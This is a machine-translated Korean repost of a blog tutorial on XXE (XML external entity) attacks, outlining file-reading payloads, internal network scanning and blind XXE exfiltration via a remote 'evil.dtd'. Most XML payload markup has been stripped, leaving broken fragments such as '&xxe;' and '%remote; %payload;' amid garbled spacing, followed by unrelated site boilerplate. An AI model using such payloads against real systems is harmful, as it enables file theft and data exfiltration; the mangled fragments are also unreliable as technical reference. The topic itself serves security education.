XXE 구멍

원본 링크:http://wyb0.com/posts/xxe/
0x00 XXE
XXE 구멍 은 XML 인 터 랙 션 을 사용 하 는 웹 프로그램 에 대한 공격 방법 입 니 다.
XML 파일 은 설정 파일 (spring, Struts 2 등), 문서 구조 설명 파일 (PDF, RSS 등), 이미지 형식 파일 (SVG header) 로 서 광범 위 하 게 응용 된다.
0x 01 XML 형식

  



  
  
  
  
  
]>



Tom
John
Reminder
Hi,I’am John

0x 02 내부 성명 및 외부 참조

0x 03 XXE 구멍

외부 인용 시 구멍 이 생 길 수 있 습 니 다. 몇 가지 payload:



  
]>
&xxe;



  
  %d;
]>
&b;

evil.dtd     ：



&b;

evil.dtd     ：

간단하게 돌아 가기



  
  
]>

  &xxe;

내부 네트워크 스 캔

Blind-XXE



    
    
    %remote;   
    %payload;   
]>
&send;


">

  
  
      
      
    %remote;  
    %all;  
    %send;  
]>


">

참조 (삭제):

http://blog.csdn.net/u011721501/article/details/43775691

이 내용에 흥미가 있습니까?

현재 기사가 여러분의 문제를 해결하지 못하는 경우 AI 엔진은 머신러닝 분석(스마트 모델이 방금 만들어져 부정확한 경우가 있을 수 있음)을 통해 가장 유사한 기사를 추천합니다:

다양한 언어의 JSON

JSON은 Javascript 표기법을 사용하여 데이터 구조를 레이아웃하는 데이터 형식입니다. 그러나 Javascript가 코드에서 이러한 구조를 나타낼 수 있는 유일한 언어는 아닙니다. 저는 일반적으로 '객체'{}...

텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.

CC BY-SA 2.5, CC BY-SA 3.0 및 CC BY-SA 4.0에 따라 라이센스가 부여됩니다.

좋은 웹페이지 즐겨찾기

개발자 우수 사이트 수집

개발자가 알아야 할 필수 사이트 100선 추천 우리는 당신을 위해 100개의 자주 사용하는 개발자 학습 사이트를 정리했습니다